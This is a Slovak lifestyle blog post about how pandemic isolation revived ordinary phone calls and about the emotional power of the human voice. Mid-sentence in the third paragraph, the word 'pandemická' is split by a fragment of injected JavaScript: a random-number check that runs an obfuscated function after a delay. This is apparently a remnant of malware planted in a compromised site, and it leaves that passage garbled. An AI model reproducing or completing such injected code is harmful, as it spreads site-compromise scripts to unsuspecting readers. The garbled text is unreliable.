Telefonovanie je opäť cool

| január 31, 2021

Rok 2020 priniesol veľa životných zmien. Menej chodíme von, menej cestujeme, takmer vôbec sa nestretávame. Aj to si, prirodzene, vyberá svoju daň, a to najmä na ľudskej psychike. Jednou z hlavných ľudských potrieb je potreba socializovať sa a byť v spoločnosti iných ľudí. Posledných pár mesiacov strávených v karanténe sa však výrazne odrazilo najmä na našich telefónnych účtoch. A dôvod nie je prekvapivý.

Človek ako tvor spoločenský potrebuje byť v ľudskom kontakte prakticky neustále. Či už sa označujete za extrovertku alebo jej pravý opak, úplne každý z nás potrebuje dennodenne zažívať istý druh ľudského kontaktu. A to či už priameho alebo nepriameho, osobného alebo neosobného, verbálneho či neverbálneho. Za posledné mesiace sa ale kvôli obmedzeniam stal – najmä ten priamy, ľudský kontakt – skôr privilégiom. To sa však odrazilo na štatitikách mobilných operátorov. Za posledné obdobie sme sa totiž nanovo obnovil starý dobrý fenomén “klasického” telefonovania.

V podstate až do začiatku marca 2020 nám naše mobilné telefóny slúžili doslova na všetko možné, s výnimkou ich pravého účelu – telefonovania. A keďže sú dnešné moderné smartfóny v podstate len zmenšené verzie výkonných počítačov a fotoaparátov, na ich primárnu funkciu ako je smskovanie či volanie sa až tak často, žiaľ, nepoužívajú. Veď na to už predsa existujú aplikácie, v ktorých sa môžeme ľahko a jednoducho dorozumievať pomocou písmen a správ, tak načo zdvíhať telefón? Za posledných pár mesiacov, kedy sa pandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andemická situácia po celom svete začala rapídne zhoršovať, sa to však zmenilo. Mobilní operátori hlásia obrovské nárasty v počte telefonátov, ktoré sme si medzi sebou vymenili. Prečo je to však tak?

Hoci si to často ani neuvedomujeme, ľudský hlas je veľmi silný nástroj. Vďaka nemu dokážeme okamžite rozoznať či už náladu, postoj alebo citové rozpoloženie, v ktorom sa ten druhý momentálne nachádza. Bolo vedecky dokázané, že sa do hlasu ako takého dokážeme dokonca aj zamilovať, a to bez toho aby sme jeho majiteľa poznali, či vôbec niekedy predtým videli. O to väčšiu moc má hlas práve v dobách, kedy jedinou možnosťou ako sa môžeme s našimi blízkymi “reálne” porozprávať, je práve zdvihnutím telefónu, ako tomu bolo kedysi, keď moderné technológie ani nesnívali o tom, že budú raz na takej úrovni, na akej sú dnes. 

Tým, že sme schopní našu rodinu, či priateľov aspoň počuť z druhej strany linky nám poskytuje akýsi osobnejší, bližší kontakt ako len pri pasívnom smskovaní. Vďaka tomu sa môžeme cítiť aj my aspoň trošku ľudskejšie a spoločenskejšie aj za týchto netradičných podmienok. Hoci je vytáčanie čísel, zdá sa, len na chvíľu reinkarnovaným fenoménom, treba uznať, že má niečo do seba a dopriať si ho sem-tam aj v časoch, kedy nie je našou jedinou možnosťou, ako sa spojiť s blízkymi a priateľmi. 

Foto: i-d.com, marieclaire.com

Tags:

Category: HOMEPAGE, VZŤAHY & SEX

Comments are closed.